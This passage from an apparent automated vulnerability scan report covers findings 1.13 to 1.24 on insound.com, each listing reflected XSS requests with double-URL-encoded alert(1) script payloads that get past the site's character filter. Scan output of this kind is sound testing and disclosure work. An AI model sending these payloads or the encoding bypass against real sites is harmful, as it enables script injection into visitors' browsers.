1.13. http://www.insound.com/search/query/Blood%20Red%20Shoes&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blood%20Red%20Shoes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85924%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e30c6a4c39 was submitted in the REST URL parameter 3. This input was echoed as 85924"><script>alert(1)</script>5e30c6a4c39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blood%20Red%20Shoes85924%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e30c6a4c39&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=gpqs36gsgpdlk1pjrbqeu15925; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=564825777; expires=Sun, 09-Jan-2011 02:40:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=551243400; expires=Sun, 09-Jan-2011 02:40:21 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Blood Red Shoes85924"><script>alert(1)</script>5e30c6a4c39" />
...[SNIP]...

1.14. http://www.insound.com/search/query/Blood%20Red%20Shoes&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blood%20Red%20Shoes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e7eb1%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94572236aff was submitted in the REST URL parameter 3. This input was echoed as e7eb1</title><script>alert(1)</script>94572236aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blood%20Red%20Shoese7eb1%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94572236aff&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=op9867aiqvtnnd3h7l2f9rup75; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=276676337; expires=Sun, 09-Jan-2011 02:40:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=96659451; expires=Sun, 09-Jan-2011 02:40:28 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Blood Red Shoese7eb1</title><script>alert(1)</script>94572236aff</title>
...[SNIP]...

1.15. http://www.insound.com/search/query/Braids&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Braids&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8d94%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0aec05a6ed was submitted in the REST URL parameter 3. This input was echoed as e8d94"><script>alert(1)</script>c0aec05a6ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Braidse8d94%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0aec05a6ed&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rd54lkq30mjfs17pf5bi5ib283; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=542210751; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=37649456; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Braidse8d94"><script>alert(1)</script>c0aec05a6ed" />
...[SNIP]...

1.16. http://www.insound.com/search/query/Braids&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Braids&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 9b08c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e80cca7b54 was submitted in the REST URL parameter 3. This input was echoed as 9b08c</title><script>alert(1)</script>9e80cca7b54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Braids9b08c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e80cca7b54&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1676qfedjjs19ujp7mn2rlkjo0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=359516446; expires=Sun, 09-Jan-2011 02:38:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=483670689; expires=Sun, 09-Jan-2011 02:38:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Braids9b08c</title><script>alert(1)</script>9e80cca7b54</title>
...[SNIP]...

1.17. http://www.insound.com/search/query/Breathe%20Owl%20Breathe&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Breathe%20Owl%20Breathe&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30e12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e15f5e9c4cda was submitted in the REST URL parameter 3. This input was echoed as 30e12"><script>alert(1)</script>15f5e9c4cda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Breathe%20Owl%20Breathe30e12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e15f5e9c4cda&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=pkup8vl7hjj5ajgd0v76u1kh55; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=170695311; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=332278604; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Breathe Owl Breathe30e12"><script>alert(1)</script>15f5e9c4cda" />
...[SNIP]...

1.18. http://www.insound.com/search/query/Breathe%20Owl%20Breathe&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Breathe%20Owl%20Breathe&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bbe5f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ebd0056fb9 was submitted in the REST URL parameter 3. This input was echoed as bbe5f</title><script>alert(1)</script>4ebd0056fb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Breathe%20Owl%20Breathebbe5f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ebd0056fb9&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=avclvskv2n84ffbsn14q7719r6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:44 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=171512412; expires=Sun, 09-Jan-2011 02:40:44 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=92034351; expires=Sun, 09-Jan-2011 02:40:44 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Breathe Owl Breathebbe5f</title><script>alert(1)</script>4ebd0056fb9</title>
...[SNIP]...

1.19. http://www.insound.com/search/query/British%20Sea%20Power&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/British%20Sea%20Power&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c59f0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e45e0dddf740 was submitted in the REST URL parameter 3. This input was echoed as c59f0</title><script>alert(1)</script>45e0dddf740 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/British%20Sea%20Powerc59f0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e45e0dddf740&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3u2hlft8dc06r39li80ipbtcc1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=129333213; expires=Sun, 09-Jan-2011 02:40:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=483352642; expires=Sun, 09-Jan-2011 02:40:48 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>British Sea Powerc59f0</title><script>alert(1)</script>45e0dddf740</title>
...[SNIP]...

1.20. http://www.insound.com/search/query/British%20Sea%20Power&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/British%20Sea%20Power&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 362fb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e289eede2243 was submitted in the REST URL parameter 3. This input was echoed as 362fb"><script>alert(1)</script>289eede2243 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/British%20Sea%20Power362fb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e289eede2243&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=8s0r80ua5ik1nmgrkakdaoai56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=143145132; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=61588631; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="British Sea Power362fb"><script>alert(1)</script>289eede2243" />
...[SNIP]...

1.21. http://www.insound.com/search/query/CANT&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/CANT&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef4bd9f8e33a was submitted in the REST URL parameter 3. This input was echoed as 64f09"><script>alert(1)</script>f4bd9f8e33a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/CANT64f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef4bd9f8e33a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ugbqdm83hf2jkie38eitjbo3k1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=164300682; expires=Sun, 09-Jan-2011 02:39:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=16200412; expires=Sun, 09-Jan-2011 02:39:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="CANT64f09"><script>alert(1)</script>f4bd9f8e33a" />
...[SNIP]...

1.22. http://www.insound.com/search/query/CANT&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/CANT&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 9303a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b797b7cace was submitted in the REST URL parameter 3. This input was echoed as 9303a</title><script>alert(1)</script>4b797b7cace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/CANT9303a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b797b7cace&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=f5c0fduis3t5vvkhio5qbjkf81; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=95704739; expires=Sun, 09-Jan-2011 02:39:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=246303134; expires=Sun, 09-Jan-2011 02:39:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>CANT9303a</title><script>alert(1)</script>4b797b7cace</title>
...[SNIP]...

1.23. http://www.insound.com/search/query/CFCF&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/CFCF&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 92588%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e4228ca9d4 was submitted in the REST URL parameter 3. This input was echoed as 92588</title><script>alert(1)</script>1e4228ca9d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/CFCF92588%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e4228ca9d4&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=kde0f1ufvh27ets53ptvjliam7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=175246752; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=374433821; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>CFCF92588</title><script>alert(1)</script>1e4228ca9d4</title>
...[SNIP]...

1.24. http://www.insound.com/search/query/CFCF&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/CFCF&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f843%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e243c2d95501 was submitted in the REST URL parameter 3. This input was echoed as 5f843"><script>alert(1)</script>243c2d95501 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/CFCF5f843%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e243c2d95501&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=he6b1tjj10n25pqofggj3fqod7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=196252129; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=43539892; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
